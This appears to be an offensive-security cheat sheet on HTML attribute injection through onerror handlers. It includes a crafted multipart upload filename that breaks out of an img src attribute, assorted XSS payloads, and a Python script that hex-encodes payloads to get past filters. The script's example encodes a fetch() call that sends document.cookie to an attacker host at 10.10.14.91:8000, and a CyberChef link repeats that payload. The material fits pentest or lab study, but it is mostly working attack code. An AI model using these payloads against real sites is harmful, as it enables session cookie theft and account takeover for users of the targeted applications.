HTML Injection
The OnError Bypass Method
The onerror event handler is one of the most reliable HTML injection techniques because it triggers automatically when an HTML element fails to load a resource.
This makes it ideal for bypassing input filters that don't sanitize quotes
x" onerror="PAYLOAD" x="Breakdown
x"- Closes the current HTML attribute valueonerror=""- Injects the JavaScript event handlerx="- Opens a new attribute to maintain valid HTML syntax
File Upload Context
<img src="<?php echo $cat['photo_path']; ?>" alt="x" onerror="" x="" class="cat-photo">Trigger the Error
Content-Disposition: form-data; name="cat_photo"; filename="x\"onerror=\"[encoded_payload]\" x=\".png"
Content-Type: image/png
GIF89a;
testContext-Aware Payload Construction
filename" onerror="alert(document.domain)" x="<img src=x onerror="alert(1)">malicious" onerror="payload" x=".txttest" onmouseover="alert(document.cookie)" x="Common characters that may be filtered
Parentheses
()- Required for JavaScript function callsSemicolons
;- Used to terminate JavaScript statementsQuotes
'- May be filtered while"is notAngle brackets
<>- HTML tag delimiters
Bypass Using HTML Hex Encoding
Python encoding script
#!/usr/bin/python3
import sys
if len(sys.argv) != 2:
print(f'[!] Usage: {sys.argv[0]} <payload>')
sys.exit(1)
string = sys.argv[1]
def Encoding(string):
output = ''
for character in string:
output += '&#x' + hex(ord(character))[2:]
return output
if __name__ == '__main__':
hexHtmlEncoding = Encoding(string)
print(hexHtmlEncoding)python3 encode.py "fetch('http://10.10.14.91:8000/?cookie=' + document.cookie);"Cyber-Chef Recipe example
https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity(true,'Hex%20entities')Find_/_Replace(%7B'option':'Regex','string':';'%7D,'',true,false,true,false)&input=ZmV0Y2goJ2h0dHA6Ly8xMC4xMC4xNC45MTo4MDAwLz9jb29raWU9JyArIGRvY3VtZW50LmNvb2tpZSk7&ieol=CRLF&oeol=FFLast updated